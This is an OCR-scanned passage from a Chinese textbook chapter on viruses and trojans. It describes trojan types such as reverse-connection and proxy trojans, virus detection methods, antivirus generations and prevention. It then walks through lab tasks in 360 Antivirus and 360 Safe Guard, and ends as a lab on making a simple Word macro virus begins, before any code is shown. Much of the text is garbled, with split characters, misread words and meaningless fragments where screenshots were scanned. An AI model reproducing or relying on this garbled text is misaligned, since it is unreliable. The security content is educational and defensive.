越 大 。 所 以 ,这 种 木马 的 危害 不 是 体现 在 被 感染 计算 机 上 ,而 是 体现 在 黑客 利用 它 来 攻击 一 
台 又 一 台 计 算 机 ,给 网 络 造成 很 大 的 伤害 和 带 来 损失 。 

(6) FTP 型 木马 。 这 种 木马 是 最 简单 而 古老 的 木马 , 它 的 唯一 功能 就 是 打开 21 号 端口 
等 待 用 户 连 接 。 新 FTP 木马 还 加 上 密码 功能 ,这 样 只 有 黑客 本 人 才 知 道 正 确 的 密码 ,从 而 
进入 对 方 计算 机 。 

(7) 反弹 端口 型 木马 。 防 火 墙 对 于 连 入 的 连接 往往 会 进行 非常 严格 的 过 滤 , 但 是 对 于 
连 出 的 连接 却 玖 于 防范 。 和 一 般 的 木马 相反 ,反弹 端口 型 木马 的 服务 端 (被 控制 端 ) 往 往 使 
用 主动 端口 ,客户 端 (控制 端 ) 使 用 被 动 端口 。 木 马 定时 监测 控制 端的 存在 ,发 现 控制 端 上 线 
立即 弹出 端口 主动 连接 控制 端 打 开 的 被 动 端口 ;为 了 隐蔽 起 见 , 控 制 端的 被 动 端口 一 般 是 
80, 使 用 户 以 为 是 自己 在 浏览 网 页 。 

(8) 代理 型 木马 。 黑 客 在 入 侵 的 同时 会 掩盖 自己 的 足迹 ,谨防 别人 发 现 自己 的 身份 。 
代理 型 木马 最 重要 的 任务 就 是 给 被 控制 的 “肉鸡 ”种 上 代理 木马 ,让 其 变 成 攻击 者 发 动 攻击 
的 跳板 。 通 过 代理 木马 ,攻击 者 可 以 在 匿名 的 情况 下 使 用 Telnet、ICQ、IRC 等 程序 ,从 而 隐 
项 自己 的 踪迹 。 

(9) 程序 杀手 型 木马 。 前 面 的 木马 功能 虽然 形形色色 ,不 过 到 了 对 方 机 器 上 要 发 挥 作 
用 ,还 需要 过 防 木马 软件 这 一 关 。 常 见 的 防 木马 软件 有 Zone Alarm、 Norton Anti-Virus 
等 。 而 程序 杀手 型 木马 则 可 以 关闭 对 方 机 器 上 运行 的 这 类 程序 ,使 得 其 他 的 木马 能 更 好 地 
发 挥 作用 。 





4.3.6 反 病 毒 技术 


1. 病毒 检测 原理 
在 与 病毒 的 对 抗 中 ,及 早 发 现 病毒 是 很 重要 的 。 早 发 现 、 早 处 置 ,可 以 减少 损失 。 检 测 
病毒 方法 有 : 特征 代码 法 、 校 验 和 法 ,行为 监测 法 ,软件 模拟 法 、 比 较 法 、 传 染 实 验 法 等 ,这 些 
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方法 依据 的 原理 不 同 ,实现 时 所 需 开 销 不 同 ,检测 范围 也 不 同 ,各 有 所 长 。 

(1) 特征 代码 法 。 特 征 代码 法 是 检测 已 知 病毒 的 最 简单 .开销 最 小 的 方法 。 其 原理 是 
采集 所 有 已 知 病毒 的 特征 代码 ,并 将 这 些 病毒 独 有 的 特征 代码 存放 在 一 个 病毒 资料 库 ( 病 毒 
库 ) 中 。 检 测 时 ,以 扫描 的 方式 将 待 检测 文件 与 病毒 库 中 的 病毒 特征 代码 进行 一 一 对 比 , 如 
果 发 现 有 相同 的 特征 代码 ,由 于 特征 代码 与 病毒 一 一 对 应 , 便 可 以 断定 ,被 查 文件 中 感染 何 
种 病毒 。 

特征 代码 法 的 优点 是 : 检测 准确 快速 ,可 识别 病毒 的 名 称 , 误 报警 率 低 ,依据 检测 结果 
可 做 解毒 处 理 。 特 征 代码 法 对 从 未 见 过 的 新 病毒 ,自然 无 法 知道 其 特征 代码 ,因而 无 法 去 检 
测 这 些 新 病毒 。 随 着 已 知 病毒 数量 的 不 断 增加 ,病毒 库 将 越 来 越 大 ,病毒 扫描 速度 也 将 越 来 
越 慢 。 

(2) 校 验 和 法 。 校 验 和 法 是 将 正常 文件 的 内 容 ,计算 其 校 验 和 ,将 该 校 验 和 写 入 文件 中 
或 写 入 别 的 文件 中 保存 。 在 文件 使 用 过 程 中 ,定期 地 或 每 次 使 用 文件 前 ,检查 文件 现在 内 容 
算出 的 校 验 和 与 原来 保存 的 校 验 和 是 否 一 致 ,以 此 来 发 现 文件 是 否 感染 病毒 。 采 用 校 验 和 
法 检测 病毒 既 可 发 现 已 知 病毒 又 可 发 现 未 知 病毒 ,但 是 它 不 能 识别 病毒 种 类 ,更 不 能 报 出 病 
毒 名 称 。 由 于 病毒 感染 并 非 文 件 内 容 改 变 的 唯一 的 非 他 性 原因 ,文件 内 容 的 改变 有 可 能 是 
正常 程序 引起 的 ,所 以 校 验 和 法 常常 误 报警 。 

(3) 行为 监测 法 。 利 用 病毒 的 特有 行为 特征 来 监测 病毒 的 方法 , 称 为 行为 监测 法 。 通 
过 对 病毒 多 年 的 观察 .研究 ,人 们 发 现 有 一 些 行为 是 病毒 的 共同 行为 ,而 且 比 较 特殊 。 当 程 
序 运行 时 ,监视 其 行为 ,如 果 发 现 了 病毒 行为 .立即 报警 。 

(4) 软件 模拟 法 。 它 是 一 种 软件 分 析 器 ,用 软件 方法 来 模拟 和 分 析 程 序 的 运行 ,之 后 演 
绎 为 虚拟 机 上 进行 的 查 毒 、 启 发 式 查 毒 技术 等 ,是 相对 成 熟 的 技术 。 新 型 检测 工具 纳入 了 软 
件 模拟 法 ,该 类 工具 开始 运行 时 ,使 用 特征 代码 法 检测 病毒 ,如果 发 现 有 隐蔽 性 病毒 或 多 态 
性 病毒 (采用 特殊 加 密 技术 编写 的 病毒 ) 嫌 疑 时 ,启动 软件 模拟 模块 ,监视 病毒 的 运行 , 待 病 
毒 自身 的 密码 译 码 以 后 ,再 运用 特征 代码 法 来 识别 病毒 的 种 类 。 

多 态 性 病毒 每 次 感染 都 变化 其 病毒 密码 .对 付 这 种 病毒 ,特征 代码 法 失效 。 因 为 多 态 性 
病毒 代码 实施 密码 化 ,而 且 每 次 所 用 密 钥 不 同 , 把 染 毒 的 病毒 代码 相互 比较 ,也 无 法 找 出 相 
同 的 可 能 作为 特征 的 稳定 代码 。 虽 然 行为 监测 法 可 以 检测 多 态 性 病毒 ,但 是 在 检测 出 病毒 
后 ,因为 不 知 病毒 的 种 类 ,难于 做 “消毒 "处理 。 

(5) 比较 法 。 比 较 法 是 用 原始 的 或 正常 的 文件 与 被 检测 的 文件 进行 比较 。 比 较 法 包括 
长 度 比 较 法 、 内 容 比 较 法 、 内 存 比 较 法 .中断 比 较 法 等 。 这 种 比较 法 不 需要 专用 的 检测 病毒 
程序 ,只 要 用 常规 DOS 软件 和 PCtools 等 工具 软件 就 可 以 进行 。 

(6) 传染 实验 法 。 这 种 方法 的 原理 是 利用 了 病毒 的 最 重要 的 基本 特征 传染 性 。 所 
有 的 病毒 都 会 进行 传染 ,如 果 不 会 传染 ,就 称 不 上 病毒 。 如 果 系 统 中 有 异常 行为 ,最 新 版 的 
检测 工具 也 查 不 出 病毒 时 ,就 可 以 做 传染 实验 ,运行 可 疑 系统 中 的 程序 后 ,再 运行 一 些 确切 
知道 不 带 毒 的 正常 程序 ,然后 观察 这 些 正常 程序 的 长 度 和 校 验 和 ,如 果 发 现 有 的 程序 长 度 增 
长 ,或 者 校 验 和 发 生变 化 ,就 可 断言 系统 中 有 病毒 。 

现在 的 杀毒 软件 一 般 是 利用 其 中 的 一 种 或 几 种 手段 进行 检测 ,严格 地 说 ,由 于 病毒 编制 
技术 的 不 断 提 高 , 想 绝对 地 检测 或 者 预防 病毒 ,目前 来 说 还 没有 完全 的 把 握 。 
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2. 反 病 毒 软件 

到 目前 为 止 , 反 病毒 软件 已 经 经 历 了 4 个 阶段 ,具体 如 下 。 

(1) 第 一 代 反 病毒 软件 采取 单纯 的 特征 码 检测 技术 ,将 病毒 从 染 毒 文件 中 清除 ,这 种 方 
法 准确 可 靠 。 但 后 来 由 于 病毒 采取 了 多 态 、 变 形 等 加 密 技 术 后 ,这 种 简单 的 静态 扫描 技术 就 
有 些 力不从心 了 。 

(2) 第 二 代 反 病毒 软件 采用 了 一 般 的 启发 式 扫描 技术 、 特 征 码 检 测 技 术 和 行为 监测 技 
术 , 加 入 了 病毒 防火 墙 ,实时 对 病毒 进行 动态 监控 。 

(3) 第 三 代 反 病毒 软件 在 第 二 代 的 基础 上 采用 了 虚拟 机 技术 ,将 查 、 杀 病毒 合 二 为 一 ， 
具有 能 全 面 实现 防 、 查 、 杀 等 反 病 毒 所 必 备 的 能 力 , 并 且 以 驻 留 内 存 的 形式 有 效 防止 病毒 的 
人 侵 。 

(4) 现在 的 反 病毒 软件 已 经 基本 跨 入 了 第 四 代 。 第 四 代 反 病毒 软件 在 第 三 代 反 病毒 软 
件 的 基础 上 ,结合 人 工 智能 技术 ,实现 启发 式 、 动 态 、 智 能 的 查 杀 技 术 。 它 采用 了 CRC 校 验 
和 扫描 机 理 、 启 发 式 智能 代码 分 析 模 块 . 动 态 数据 还 原 模块 (这 种 技术 能 一 定 程度 上 查 杀 加 
过 伪装 后 的 病毒 ) .内 存 杀毒 模块 、 自 身 免疫 模块 (防止 自身 染 毒 ,防止 自身 被 病毒 强行 关闭 ) 
等 先进 技术 , 较 好 地 解决 了 前 几 代 反 病 毒 软件 的 缺点 。 

3. 病毒 的 预防 

计算 机 病毒 的 预防 是 指 通过 建立 合理 的 病毒 预防 体系 和 制度 ,及 时 发 现 病毒 人 侵 ,并 采 
取 有 效 的 手段 来 阻止 病毒 的 传播 和 破坏 。 当 前 ,计算 机 病毒 十 分 猩 狂 , 即 便 安 装 了 反 病 毒 软 
件 , 也 不 能 说 是 绝对 的 安全 ,用 户 应 养 成 安全 习惯 ,重点 在 病毒 的 预防 上 下 功夫 。 下 面 是 几 
种 常用 的 病毒 预防 技术 。 

(1) 操作 系统 漏洞 的 检测 和 安全 补丁 安装 。 对 病毒 的 预防 是 从 安装 操作 系统 开始 的 ， 
安装 前 应 准备 好 操作 系统 补丁 和 反 病 毒 软件 .防火 墙 软件 等 。 安 装 操作 系统 时 ,必须 拔 掉 网 
线 。 操 作 系统 安装 完毕 后 ,必须 立即 打上 补丁 并 安装 反 病 毒 软件 和 防火 墙 软件 。 

系统 漏洞 检测 可 以 自动 发 现 系统 中 存在 的 问题 ,很 多 反 病 毒 软件 白带 了 漏洞 检测 工具 ， 
漏洞 检测 工具 的 使 用 也 很 简单 ,常见 的 安全 工具 都 提供 相应 的 漏洞 扫描 功能 ,如 “360 安全 
卫士 "提供 的 系统 漏洞 扫描 功能 就 可 以 实现 漏洞 扫描 ,自动 安装 漏洞 补丁 。 

(2) 操作 系统 安全 设置 。 必 须 设 置 登录 账户 密码 ,并 且 必 须 设 置 得 复杂 一 些 ,不 能 太 简 
单 或 不 设置 。 这 部 分 的 内 容 在 项 目 2 中 已 作 详 细 介 绍 。 

(3) 及 时 升级 病毒 特征 库 。 要 及 时 升级 反 病毒 软件 和 病毒 特征 库 , 一 般 可 设置 为 每 天 
自动 定时 升级 。 

(4) 关闭 不 必要 的 端口 。 病 毒 人 侵 和 传播 通常 使 用 137、138、139 和 445 端口 ,关闭 这 
些 端口 后 ,将 无 法 再 使 用 网 上 邻居 和 文件 共享 功能 。 建 议 用 户 关闭 这 些 端口 。 

(5) 谨慎 安装 各 种 插件 。 访 问 网 页 时 , 若 网 页 弹出 提示 框 , 要 求 安装 什么 插件 时 ,一 定 
要 看 清楚 是 要 安装 什么 内 容 , 不 要 随意 同意 安装 。 

(6) 不 要 随意 访问 不 知名 网 站 ,可 减少 中 病毒 的 机 会 ,可 以 考虑 使 用 带 有 网 页 防御 功能 
的 安全 浏览 器 产品 。 

(7) 不 要 随意 下 载 文件 .打开 电子 邮件 附件 及 使 用 P2P 传输 文件 等 。 

(8) 删除 系统 中 的 默认 共享 资源 。 

(9) 定期 备份 重要 文件 ,定期 检查 敏感 文件 和 敏感 部 位 。 
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44 项 目 实 施 


4.4.1 任务 1: 360 杀毒 软件 的 使 用 


1. 任务 目标 

(1) 掌握 360 杀毒 软件 的 使 用 方法 。 

(2) 了 解 安 装 杀毒 软件 的 重要 人 性。 

2. 任务 内 容 

(1) 安装 360 杀毒 软件 。 

(2) 软件 升级 。 

(3) 病毒 查 杀 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 

(2) 360 杀毒 软件 1 套 。 

4. 任务 实施 步骤 

360 杀毒 软件 是 360 安全 中 心 出 品 的 一 款 免 费 的 云 安全 杀毒 软件 。 它 创新 性 地 整合 了 
五 大 领先 查 杀 引擎 ,包括 国际 知名 的 BitDefender 病毒 查 杀 引擎 .小 红 伞 病 毒 查 杀 引擎 、 
360 云 查 杀 引擎 、360 主动 防御 引擎 以 及 360 第 二 代 QVM 人 工 智能 引擎 ,为 用 户 带 来 安全 、 
专业 、 有 效 ,新 颖 的 查 杀 防护 体验 。 其 防 杀 病毒 能 力 得 到 多 个 国际 权威 安全 软件 评测 机 构 认 
可 ,荣获 多 项 国际 权威 认证 。 

据 艾 瑞 咨询 数据 显示 ,2016 年 度 安全 防护 类 软件 市 场 份额 前 十 名 的 产品 中 ,按照 月 度 
覆盖 人 数 比例 计算 ,360 安全 卫士 以 91. 76% 的 市 场 份 额 扩 大 领先 优势 ,360 杀毒 以 73. 91% 
的 市 场 份额 排名 第 二 ,卫士 十 杀毒 ”组 合成 为 目前 国内 PC 的 主流 安全 配置 。 

1) 安装 360 杀毒 软件 

步骤 1: 在 360 杀毒 官方 网 站 (sd. 360. cn) 下 载 最 新 版 本 的 360 杀毒 软件 安装 程序 ,本 
项 目 以 360 杀毒 软件 v5.0 版 本 为 例 来 说 明 。 

步骤 2: 双击 已 经 下 载 的 安装 程序 图 标 ,进入 360 杀毒 安装 界面 ,如 图 4-5 所 示 , 选 中 


360 杀 盏 5.0 


正式 版 5.0.0.7033 


安装 到 : CNProgram Files\360\360sd 
剩余 空间 : 323G 





图 4-5 306 杀毒 软件 安装 界面 
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“我 已 阅读 并 同意 许可 协议 ” 复 选 框 ,否则 无 法 安装 。 安 装 路 径 默 认为 “C:\Program Files\ 
360\360sd”, 也 可 单 击 右 侧 的 “更 改 目录 ?按钮 更 改 安装 路 径 。 
步骤 3: 单 击 “立即 安装 ”按钮 ,开始 安装 360 杀毒 软件 ,安装 完成 后 进入 程序 主 窗口 ,如 
图 4-6 所 示 。 





防护 未 完全 开启 ， 
一 键 开 启 











9 
ON EQ 昭 
\ OD 
全 盘 扫 摘 快速 扫 摘 功能 大 全 
回 
多 ? 齐 Rr 中 : 国 贺 圆 贺 固 自 定 义 扫 续 去 六 惠 扫 村 弹 罕 近 巷 手机 助手 
人 版 本 5007033 栓 林 更 新 国 江 日 中 心 ， 260 为 1 么 各 9 委 ? 





图 4-6 “306 杀毒 "程序 主 窗口 


2) 软件 升级 

360 杀毒 软件 具有 自动 升级 功能 ,如 果 开启 了 自动 升级 功能 ,360 杀毒 软件 会 在 有 升级 
可 用 时 自动 下 载 并 安装 升级 文件 。 自 动 升级 完成 后 会 通过 气泡 窗口 来 提示 。 

步骤 1: 在 图 4-6 中 , 单 击 右 上 角 的 设置? 超 链接 ,打开 *360 杀毒 - 设置 ?对 话 框 ,如 
图 4-7 所 示 。 


加 3eok 寺 -设置 
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图 4-7 “360 杀毒 - 设置 "对话 框 
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步骤 2: 在 左 侧 窗 格 中 选择 “升级 设置 ”选项 ,在 右 侧 窗 格 中 选中 “自动 升级 病毒 特征 库 
及 程序 ” 单 选 按 钮 。 

步骤 3: 单 击 “确定 ”按钮 ,返回 360 杀毒 "程序 主 窗口 ,也 可 单 击 窗口 底部 的 “检查 更 
新 "按钮 进行 手动 更 新 ,升级 程序 会 连接 服务 器 检查 是 否 有 可 用 更 新 ,如 果 有 就 会 下 载 并 安 
装 升级 文件 ,升级 完成 后 会 提示 “升级 成 功 完成 ,您 的 病毒 库 和 程序 已 是 最 新 !”。 

3) 病毒 查 杀 

360 杀毒 软件 具有 实时 病毒 防护 和 手动 扫描 功能 ,为 系统 提供 全 面 的 安全 防护 。 

实时 防护 功能 在 文件 被 访问 时 对 文件 进行 扫描 ,及 时 拦截 活动 的 病毒 ,在 发 现 病毒 时 会 
通过 提示 窗口 发 出 警告 。 

360 杀毒 软件 提供 了 五 种 手动 病毒 扫描 方式 : 全 盘 扫 描 ,\ 快 速 扫描 、 自 定义 扫描 、 宏 病 
毒 扫描 和 右键 扫描 。 

步骤 1: 在 “360 杀毒 " 主 窗口 中 , 单 击 "全盘 扫描 ”按钮 ,360 杀毒 扫描 系统 设置 .常用 软 
件 、 内 存活 路 程序 、 开 机 启动 项 和 所 有 磁盘 文件 ,如 图 4-8 所 示 。 如 果 希 望 360 杀毒 在 扫描 
完成 后 自动 处 理 并 关闭 计算 机 ,请 选中 “扫描 完成 后 自动 处 理 并 关机 ” 复 选 框 。 

















Q BR : C\Windows\system32\BthUdTask.exe 
ea | ss BE sr 
共 提 搞 对 象 : 3421 共 检 出 项 ; 6 BA : 00:00:55 图 速度 最 快 性 能 最 佳 
! VW 安全 MW 安全 ) 正在 扫 摘 等 待 扫 摘 ~ 
项 目 所 述 
系统 异常 项 (6) 八 
系统 中 的 共享 资源 : Documents [ 居 复 默认 ] 系统 共享 资源 
系统 中 的 共享 资源 : Users 只 复 默认 ] 系统 共享 资源 
系统 字体 配置 异常 [恢复 默认 ] 系统 党 用 组 件 
1E 核 心动 态 库 被 动 持 [恢复 默认 ] IE 核心 配置 
正 浏览 器 针对 HTTPS 网 页 访问 的 安全 提示 [恢复 默认 ] 系统 利用 组 件 
可 疑 的 快 搜 方 式 : Directory\Background 足 复 文件 ] 点 而 快捷 方 式 
] 扫 拱 完成 后 外 动 处 理 并 关机 





4-8 全盘 扫描 





步骤 2: 单 击 * 快 速 扫描 ”按钮 ,360 杀毒 扫描 系统 设置 .常用 软件 .内 存活 路 程序 、 开 机 
启动 项 和 系统 关键 位 置 , 如 图 4-9 所 示 。 

步骤 3: 单 击 “ 自 定义 扫描 ”按钮 ,打开 “选择 扫描 目录 ”对 话 框 ,选择 需要 扫描 的 盘 符 或 
目录 ,如 “本 地 磁盘 (C:)”, 如 图 4-10 所 示 , 单 击 “ 扫 描 ” 按 钮 .开始 对 指定 的 盘 符 或 目录 进行 
病毒 查 杀 。 

步骤 4: 单 击 “ 宏 病毒 扫描 ”按钮 ,360 杀毒 扫描 所 有 文件 ,并 对 宏 病 毒 进 行 查 杀 。 
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共 昌 搞 象 ， 6437 。 共 栓 出 项 : 18 


Q cAWindows\inf\oemSiinf 


已 用 时 间 : 00:01:46 


ee EE 
! Y 安全 WY 安全 I 








项 目 
高 危 风险 硕 (1 ) 


承包 导 党 项 (6 


系统 字体 配置 异常 
正 核 心动 杞 库 被 支持 





扫把 亮 成 后 自动 处 理 并 关机 


CNprogram Files\office200N\Office12\Assoc.exe 
系统 中 的 共享 资源 : Documents 


系统 中 的 共享 资源 : Users 


IE 浏览 器 针对 HTTPS 网 页 访问 的 安全 提示 
可 大 的 快 所 方式 : Directory\Background 


圈 试 梭 复 ] QVM42.1Malware Gen 


[恢复 默认 ] 系统 共享 资源 
[恢复 默认 ] 系统 共享 资源 
[恢复 默认 ] 系统 第 用 组 件 
(恢复 默认 ] IE 核 心 配置 

(恢复 默认 ] 系统 第 用 组 件 
[由 复 文件 ] 点 面 快 理 方 式 











图 4-9 


回 久 扫 摘 目 录 


请 勾 先 上 你 要 扫 搞 的 目录 或 文件 : 


田口 曙 点 面 
由 口 国 我 8 文档 





由 -口号 DVD 驱动 吕 (E;) 


快速 扫描 





图 4-10 “选择 扫描 目录 ”对话 框 


步骤 5: 用 右键 扫描 。 右 击 某 文件 夹 , 如 “C:\Program Files”, 在 弹出 的 快捷 菜单 中 选 
择 “ 使 用 360 杀毒 扫描 ”命令 ,如 图 4-11 所 示 , 可 对 该 文件 夹 进 行 病毒 查 杀 。 


4.4.2 任务 2: 360 安全 卫士 软件 的 使 用 


1. 任务 目标 


(1) 掌握 360 安全 卫士 的 使 用 方法 。 
(2) 了 解 360 安全 卫士 的 作用 。 


2. 任务 内 容 


(1) 安装 并 升级 360 安全 卫士 。 
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个 ， 计算 机 、 本 地 BB 二 (C] ， > [4 | a wars (Cy p 
文件 (。 编 霹 (可 硅 (V) 工具 帮助 (H) 
组 织 ”局 打 开 。 所 到 中 ”#8 享 ”扼守 XH 天 三 国 @ 
六 de EE 修改 其 sm 大 小 
属 或 BPerflogs 2009/7/14 10:37 ”文科 夫 
| 上 上 Program Fles Free 
地 访问 的 位 置 。 。 由 Windows 
加 了 Rr EDF 
和 生理 取得 所 有 取 
ee, CE ers ss 
加 视 顶 
国 图 片 共享 (H) 上 
国 邓 EE 二 nm 文件 A- 
直言 乐 过” 使 用 360 绾 理 右 委 荣 单 
性 ” 沽 b 到 "program Flesrarm 
网 5 组 Et E-mail 
改 ER 到 "Program Flesrar 并 E-mail 
二 Ht 还 天 X 志 的 版 本 (V) 
外 全 到 库 中 四 » 
Bd 发 送 到 (N) » 
mW 
复制 (O 
创建 快 于 方式 (S) 
站 Program Files 修改 日 岩 2016/7/7 8:26 9(D) 
Ss 性 (R) 
使 用 360 杀 志 扫 缮 
图 4-11 右键 扫描 
(2) 计算 机 体检 。 
(3) 查 杀 木 马 。 
(4) 常规 修复 和 漏洞 修复 。 
(5) 计算 机 清理 。 
(6) 优化 加 速 。 


3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 

(2) 360 安全 卫士 软件 1 套 。 

4. 任务 实施 步骤 

360 安全 卫士 是 当前 功能 最 强 、 效 果 最 好 、 较 受用 户 欢迎 的 上 网 必 备 安全 软件 之 一 。 
360 安全 卫士 拥有 查 杀 木马 清理 插件 、 修 复 漏 洞 . 计 算 机 体检 等 多 种 功能 ,并 独创 了 “木马 
防火 墙 ? 功 能 ,依靠 抢先 侦 测 和 云端 鉴别 ,可 全 面 、 智 能 地 拦截 各 类 木马 ,保护 用 户 的 账号 . 隐 
私 等 重要 信息 。360 安全 卫士 自身 非常 轻巧 ,同时 还 具备 开机 加 速 、 垃 圾 清理 等 多 种 系统 优 
化 功能 ,可 大 大 加 快 计算 机 运行 速度 ,内 含 的 360 软件 管家 还 可 帮助 用 户 轻松 下 载 、 升 级 和 
强力 卸载 各 种 应 用 软件 。 

1) 安装 并 升级 360 安全 卫士 

步骤 1: 在 360 官方 网 站 (www. 360. cn) 下 载 最 新 版 本 的 360 安全 卫士 软件 安装 程序 ， 
本 项 目 以 360 安全 卫士 V10. 2 版 本 为 例 来 说 明 ,安装 后 的 界面 如 图 4-12 所 示 。 
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图 4-12 “360 安全 卫士 "程序 主 窗口 


步骤 2: 在 图 4-12 中 , 单 击 右 上 角 的 “ 主 菜单 ”按钮 国 . 在 打开 的 菜单 列表 中 选择 “检测 
更 新 ”命令 ,可 手动 升级 360 安全 卫士 和 备用 木马 库 到 最 新 版 。 

由 图 4-12 可 见 ,360 安全 卫士 界面 集 * 计 算 机 体检 、 查 杀 修 复 、 计 算 机 清理 \ 优 化 加 速 ” 
等 多 种 功能 于 一 身 , 内 含 的 360 软件 管家 还 可 帮助 用 户 轻松 下 载 ,升级 和 强力 印 载 各 种 应 用 
软件 ,并 且 还 提供 多 种 实用 工具 帮助 用 户 解决 计算 机 问题 和 保护 系统 安全 。 

2) 计算 机 体检 

“计算 机 体检 ”功能 可 以 全 面 地 检查 用 户 计算 机 的 各 项 状况 。 体 检 完 成 后 会 提交 一 份 优 
化 计算 机 的 意见 ,用 户 可 以 根据 需要 对 计算 机 进行 优化 ,也 可 以 便捷 地 选择 “一 键 优 化 ”。 

体检 可 以 快速 全 面 地 了 解 用 户 的 计算 机 ,并 且 可 以 提醒 用 户 对 计算 机 做 一 些 必要 的 维 
护 , 如 查 杀 木 马 、 清 理 垃圾 .修复 漏洞 等 。 定 期 体检 可 以 有 效 地 保持 用 户 计算 机 的 健康 。 

步骤 1: 在 “360 安全 卫士 ”" 主 窗口 中 , 单 击 “ 立 即 体检 ”按钮 ,360 安全 卫士 开始 对 系统 的 
故障 、 垃 圾 ,安全 、 速 度 提 升 等 各 类 项 目 进行 检测 ,检测 结束 后 给 出 一 个 体检 得 分 ,如 图 4-13 
所 示 。 

步骤 2: 单 击 “ 一 键 修复 ”按钮 ,对 所 有 存在 问题 的 项 目 进行 一 键 修复 。 

3) 查 杀 木马 

利用 计算 机 程序 漏洞 侵入 后 窃取 他 人 文件 ,财产 与 隐私 的 程序 被 称 为 木马 。 木 马 查 杀 
功能 可 以 找 出 用 户 计算 机 中 疑似 木马 的 程序 ,并 在 取得 用 户 允 许 的 情况 下 删除 这 些 程序 。 

木马 对 用 户 的 计算 机 危害 非常 大 ,可 能 导致 用 户 包 括 支付 宝 、 网 上 银行 在 内 的 重要 账户 
密码 泄密 。 木 马 的 存在 还 可 能 导致 用 户 的 隐私 文件 被 复制 或 删除 ,所 以 及 时 查 杀 木马 对 安 
全 上 网 来 说 十 分 重要 。 

步骤 1: 在 “360 安全 卫士 ”" 主 窗口 中 , 单 击 左下 角 的 “ 查 杀 修复 ”按钮 ,出 现 “ 查 杀 修 复 ” 
界面 ,可 以 选择 “快速 扫描 “全 盘 扫 描 ”" 和 “ 自 定义 扫描 ”来 检查 用 户 的 计算 机 里 是 否 存 在 木 
马 程 序 , 如 图 4-14 所 示 。 
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图 4-13 计算 机 体检 


人 ， 建议 您 立即 扫描 
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Oa Om wr 














图 4-14 查 杀 木马 


步骤 2: 扫描 结束 后 若 出 现 疑似 木马 ,可 以 选择 删除 或 加 入 信任 区 。 

4) 常规 修复 和 漏洞 修复 

常规 修复 主要 是 对 浏览 器 插件 、 网 络 组 件 、ActiveX 控件 .风险 账号 .主页 设置 .IE 核心 
设置 .常用 软件 设置 系统 关键 文件 等 进行 检测 和 修复 。 

漏洞 是 指 Windows 操作 系统 在 多 辑 设计 上 的 缺陷 或 在 编写 时 产生 的 错误 。 系 统 漏洞 
可 以 被 不 法 者 或 者 计算 机 黑客 利用 .通过 植 人 木马 、 病 毒 等 方式 来 攻击 或 控制 整个 计算 机 ， 
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从 而 窃取 用 户 计算 机 中 的 重要 资料 和 信息 ,甚至 破坏 用 户 的 系统 。 
步骤 1: 在 图 4-14 中 , 单 击 界面 右 下 角 的 "常规 修复 "按钮 ,出 现 * 常 规 修复 "界面 ,可 对 
系统 常规 设置 进行 扫描 并 修复 ,如 图 4-15 所 示 。 











扫 所 已 完成 ! 共 发 现 3 个 推荐 修复 巩 目 和 17 个 可 选修 复 项 目 ,建议 立即 
到 -= EE 
修 秘 建 议 盘 作 
个 ~ 
梧 virusinistartpagea (C\Windows\system3Z\— 
两 总 文件 信任 
27 个 ~ 
直 授 梢 除 信任 














图 4-15 常规 修复 


步骤 2: 单 击 “ 漏 洞 修复 ”按钮 ,出 现 “漏洞 修复 ”界面 ,可 对 系统 漏洞 进行 扫描 并 修复 ,如 
图 4-16 所 示 。 












口角 154 人 和 八 
加 kg26s4428 Oo47MB 
回 kz62l440 O85MB 
回 kz6s3956-V oasMB 
加 kg2675562 322MB 站 
A eeeosss a | 
加 waaeotlls 1555MB 打 避 丁 、 省 布 竟 、 统 于 理 个 业 安 全 
回 kzcassas -W oa 让 要 
KB2667402 oaoMB 
加 kB2655992 121Me 
Ke2698365 12tMe 
回 kaz7l2aog -v O54MB 
回 kBz743555 - kerberos 拒 OS5MBE 
回 KBz705219 - Windows 网 站 029MB 
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图 4-16 漏洞 修复 
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5) 计算 机 清理 





步骤 1: 在 “360 安全 卫士 ” 主 窗口 中 . 单 击 “ 计 算 机 清理 "按钮, 出现“ 计算 机 清理 ”界面 


如 图 4-17 所 示 , 单 击 “ 一 键 扫描 ”按钮 可 对 计算 机 中 的 垃圾 文件 ,浏览 器 使 用 痕迹 、 无 效 的 
注册 表 项 目 、 无 用 的 插件 、 广 告 软件 、 上 网 购物 记录 等 进行 扫描 。 


Fe 


3 


一 键 扫描 








人 的 坦 儿 修复 @ 电 后 清理 











步骤 2: 单 击 “ 一 键 清理 ”按钮 ,可 对 扫描 结果 进行 一 键 清理 。 
6) 优化 加 速 


步骤 1: 在 “360 安全 卫士 " 主 窗口 中 单 击 “ 优 化 加 速 ” 按 钮 ,出 现 “ 优 化 加 速 ”" 界 面 ,如 
图 4-18 所 示 , 单 击 “ 开 始 扫 描 ” 按 钮 ,可 对 开机 加 速 、 系 统 加 速 、 网 络 加 速 、 硬 盘 加 速 等 选项 
进行 扫描 。 











系统 Wh 连 网 络 吕 束 硕 熏 加 束 
tt wes Fase ste 
的 坦 半 修 香 电驴 污 王 (3) 优化 M0 天 [= ssmpa © na om a 
图 4-18 优化 加 速 
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步骤 2: 单 击 * 立 即 优化 "按钮 ,可 对 扫描 结果 进行 优化 设置 。 
4.4.3 任务 3: 宏 病毒 和 网 页 病毒 的 防范 


1. 任务 目标 

(1) 掌握 宏 病毒 的 防范 方法 。 

(2) 掌握 网 页 病毒 的 防范 方法 。 

2. 任务 内 容 

(1) 宏 病 毒 的 防范 。 

(2) 网 页 病毒 的 防范 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 。 

(2) Office 办 公 软 件 1 套 。 

4. 任务 实施 步骤 

1) 宏 病 毒 的 防范 

(1) 制作 一 个 简单 的 宏 病 毒 

步骤 1: 在 Word 2007/2010 程序 中 新 建 一 文档 ,然后 在 “视图 ”选项 卡 中 , 单 击 “ 宏 "下 
拉 按 钮 ,在 打开 的 下 拉 列 表 中 选择 “查看 宏 " 选 项 ,打开 “ 宏 ” 对 话 框 ,在 “ 宏 名 ”文本 框 中 输入 
autoexec, 如 图 4-19 所 示 。 


宏 名 四 
te [Cam | 


“| [sh 和 ] 
[_ 编 手中 
Cao ) 

二 


宏 的 位 置 &) :| 所 有 的 活动 模板 和 文档 =| 
说 明 (I) 
































4-19 “ 宏 ” 对 话 框 


